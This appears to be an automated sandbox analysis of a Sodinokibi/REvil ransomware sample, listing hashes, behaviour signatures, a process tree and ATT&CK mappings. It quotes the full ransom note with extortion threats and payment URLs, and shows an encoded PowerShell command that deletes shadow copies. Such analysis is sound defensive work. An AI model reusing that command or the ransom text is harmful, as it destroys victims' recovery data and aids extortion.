Analysis

  • max time kernel
    103s
  • max time network
    108s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09-08-2023 07:35

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10

Malware Config

Extracted

Path

C:\Recovery\y389ng9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension y389ng9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/21224F673EBCC2FE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/21224F673EBCC2FE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: XIyfqvnngpePFBCMlX9/h3zroE/yqjPLhfjbw04BL60+1p7Q3i57jpfSNjyWXSMA R5oeCqyXLFdbBzkfkcgc8rfOIOYydlQUzvK6cdWFo2c8RyDPSHhJ1jYCE/+QcUzd bBrd1WFEG66gmT5HT3yyd8qGtx4UyqRtUyy6lzEWl/KPpMmETegN9O0owevVC3EI M3n1RGBCMQkgtFx9ACxkGoQHjQzLXdGlTnOhXdvIKSoe0ZTtnYFFOHY8z0TYORP+ T8dyB/DvFeBAvhUitmOrjkDpXQwyfZZcMaw0zPudKSDvxbZePYLM3ryA3oX4mObm E7hnU8Y4JPJCJjkUCzs8O64iQUIzS9Or9kOu4NAmJuNFLk/eWJaKmBpD2EERnbiL 2pjJKQcpPr2/QNgm4TMsHzpfs+XBhxH3UuFE6JzPYjclGs1mG0ajuk/ga4QkIAMh Z3M2BUFg+xH3R/fdQLbWWPCsZ5c1KNirlyZFBuIV3xtSxe16JZXSIed5AbJjYzA+ DpUQeuSTRwFJdL/8elt94n1+tEtDJmmn24gICVNZsx26qQ/s64u8FQiO93THp662 jZjmUuoiTWnATmVJzHsxubpKTEeIsSZnAQ7p05jn7Kq9IvW6l7buXEiNjSo/egpv Dyg4ghnrsh4TxQE7R5bT2OuyQTCKlALF33LxE03jVhmMM5fqfKIqHszrOsD1/njr +LsqpwvvEB22PMf+LfhGJ9Jcu5pPriJRLhS03I0J3adLU19NkXxreg8bSmu/NIbd 2GoM7bTmARRx2IXE1Etxc6HNKe6YN9TlB5rTPXYTGUEpFzRqNu2a0fAr0XPgUNXJ I2vIAMNfj9wStwLf5yiKLsGVb4i05GYiHRv2t42DdTzpgfjkndfTGwO/qTCzXRRr lXjCIaVTWbdgt7qDgVET4ATIVejsxqmKr4D87iv6nPMO91TN765p73IXg+wM2RnL 3R0VxTk6CJjleJQFnpcbfIS6Td1TzsH6pV7qITxdcXSZwKvotChrCFHfV2o518oH fUEQKcsNNR1d13WaD0sAsFvBKKLxk22f1nnfqnBhmdJjzVB+o5laxISS2LK3vqod u1PaNT09fZQ7m+19GhSVQr52F+ckcGDcKOCjKsUlOvfnCJGv73aXV26RoCuIWT5P dFZKj7eDpKSyC0tUvSh/4K30qXPgoHOkTf1QvaXua4OAX+p5SiCwahuTdigobaKm +SZImSwJb4LY/Nu6tOJIV6LCy5pAQpdtmFz+V19TOAEqfDwNhOad8ZGwrFwX8KPh 5KDqexe0GOuJ4GkD0tBQMXut9gnCzB+GNJr2ygP5ZQ9HFsVJPlbNhv/rGEuUAY3a XzfXGCkaJFaph8k8xpSKWzEtCfrfmCLh2L8= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/21224F673EBCC2FE

http://decryptor.cc/21224F673EBCC2FE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 29 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:524
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3004
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:312

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\y389ng9-readme.txt
      Filesize

      7KB

      MD5

      315a645f7839ddbcd016707e1b4d45ee

      SHA1

      5daf7c0c9d77b570cf79b05ab76480c554d96533

      SHA256

      6096b71a6e304b55b1a9b7fe95d817bac6873074044eb8ca031d9ecf09208d7c

      SHA512

      0b1635340d8f16eeacae8fa9d5814552efa56600deefd4e843c1b03e203d241ed93d3a26a8469e4c2a89561e4a4241b1061298793372762faa1ec47a47fd146b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ild5rgem.5rx.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      181KB

      MD5

      a0857f2a9a01a6355b6b1f741ea937b6

      SHA1

      a8b8baaee9163756ab9d33b59dd42c9d00981017

      SHA256

      18ff76c2ea7e0f81d846b674c2f314b4d257ce2c1fe042593e3f22b0845c1019

      SHA512

      0f245aa721fc25a9487c45d61626439ae9ac46f57eaf4c34953e7252f0672fec4d20a1e82266d9ed7ab4b212bc690038d16d5a018ee43b675a84c4c9cf91d967

    • memory/524-124-0x0000018DF6480000-0x0000018DF64A2000-memory.dmp
      Filesize

      136KB

    • memory/524-131-0x00007FFF6DE70000-0x00007FFF6E85C000-memory.dmp
      Filesize

      9MB

    • memory/524-132-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-133-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-136-0x0000018DF6730000-0x0000018DF67A6000-memory.dmp
      Filesize

      472KB

    • memory/524-155-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-159-0x00007FFF6DE70000-0x00007FFF6E85C000-memory.dmp
      Filesize

      9MB